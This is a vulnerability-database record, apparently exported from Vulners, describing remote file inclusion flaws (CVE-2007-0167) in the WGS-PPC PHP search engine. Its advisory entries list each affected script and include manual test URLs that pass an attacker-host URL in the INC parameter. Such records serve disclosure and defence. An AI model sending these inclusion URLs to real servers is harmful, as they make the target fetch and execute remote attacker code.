{"cve": [{"lastseen": "2020-10-03T11:45:48", "description": "Multiple PHP file inclusion vulnerabilities in WGS-PPC (aka PPC Search Engine), as distributed with other aliases, allow remote attackers to execute arbitrary PHP code via a URL in the INC parameter in (1) config_admin.php, (2) config_main.php, (3) config_member.php, and (4) mysql_config.php in config/; (5) admin.php and (6) index.php in admini/; (7) paypalipn/ipnprocess.php; (8) index.php and (9) registration.php in members/; and (10) ppcbannerclick.php and (11) ppcclick.php in main/.", "edition": 3, "cvss3": {}, "published": "2007-01-10T01:28:00", "title": "CVE-2007-0167", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0167"], "modified": "2018-10-16T16:31:00", "cpe": ["cpe:/a:ppc_search_engine:ppc_search_engine:1.61", "cpe:/a:wgs-ppc:wgs-ppc:*"], "id": "CVE-2007-0167", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0167", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wgs-ppc:wgs-ppc:*:*:*:*:*:*:*:*", "cpe:2.3:a:ppc_search_engine:ppc_search_engine:1.61:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_main.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_main.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/config_main.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33445", "id": "OSVDB:33445", "title": "WGS-PPC (PPC Search Engine) config/config_main.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the paypalipn/ipnprocess.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the paypalipn/ipnprocess.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/paypalipn/ipnprocess.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33450", "id": "OSVDB:33450", "title": "WGS-PPC (PPC Search Engine) paypalipn/ipnprocess.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the members/registration.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the members/registration.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/members/registration.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33452", "id": "OSVDB:33452", "title": "WGS-PPC (PPC Search Engine) members/registration.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcbannerclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcbannerclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/main/ppcbannerclick.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33453", "id": "OSVDB:33453", "title": "WGS-PPC (PPC Search Engine) main/ppcbannerclick.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the main/ppcclick.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/main/ppcclick.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33454", "id": "OSVDB:33454", "title": "WGS-PPC (PPC Search Engine) main/ppcclick.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/mysql_config.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/mysql_config.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/mysql_config.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33447", "id": "OSVDB:33447", "title": "WGS-PPC (PPC Search Engine) config/mysql_config.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/index.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/index.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/admini/index.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33449", "id": "OSVDB:33449", "title": "WGS-PPC (PPC Search Engine) admini/index.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/config_admin.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33444", "id": "OSVDB:33444", "title": "WGS-PPC (PPC Search Engine) config/config_admin.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_member.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the config/config_member.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/config/config_member.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33448](https://vulners.com/osvdb/OSVDB:33448)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33446", "id": "OSVDB:33446", "title": "WGS-PPC (PPC Search Engine) config/config_member.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0167"], "description": "## Vulnerability Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nThe vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.\n## Short Description\nWGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/path/admini/admin.php?INC=http://[attacker]?\n## References:\n[Related OSVDB ID: 33445](https://vulners.com/osvdb/OSVDB:33445)\n[Related OSVDB ID: 33452](https://vulners.com/osvdb/OSVDB:33452)\n[Related OSVDB ID: 33447](https://vulners.com/osvdb/OSVDB:33447)\n[Related OSVDB ID: 33454](https://vulners.com/osvdb/OSVDB:33454)\n[Related OSVDB ID: 33444](https://vulners.com/osvdb/OSVDB:33444)\n[Related OSVDB ID: 33446](https://vulners.com/osvdb/OSVDB:33446)\n[Related OSVDB ID: 33449](https://vulners.com/osvdb/OSVDB:33449)\n[Related OSVDB ID: 33451](https://vulners.com/osvdb/OSVDB:33451)\n[Related OSVDB ID: 33453](https://vulners.com/osvdb/OSVDB:33453)\n[Related OSVDB ID: 33450](https://vulners.com/osvdb/OSVDB:33450)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html\nMail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html\nISS X-Force ID: 31355\nGeneric Exploit URL: http://milw0rm.com/exploits/3104\n[CVE-2007-0167](https://vulners.com/cve/CVE-2007-0167)\nBugtraq ID: 21961\n", "edition": 1, "modified": "2007-02-23T01:13:34", "published": "2007-02-23T01:13:34", "href": "https://vulners.com/osvdb/OSVDB:33448", "id": "OSVDB:33448", "title": "WGS-PPC (PPC Search Engine) admini/admin.php INC Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-0159", "CVE-2007-0192", "CVE-2007-0154", "CVE-2007-0181", "CVE-2007-0143", "CVE-2007-0176", "CVE-2007-0189", "CVE-2007-0182", "CVE-2007-0149", "CVE-2007-0167", "CVE-2007-0156", "CVE-2007-0205", "CVE-2007-0151", "CVE-2007-0191", "CVE-2007-0155", "CVE-2007-0150", "CVE-2007-0112", "CVE-2007-0194", "CVE-2007-0153", "CVE-2007-0202"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2007-01-09T00:00:00", "published": "2007-01-09T00:00:00", "id": "SECURITYVULNS:VULN:7020", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7020", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}]}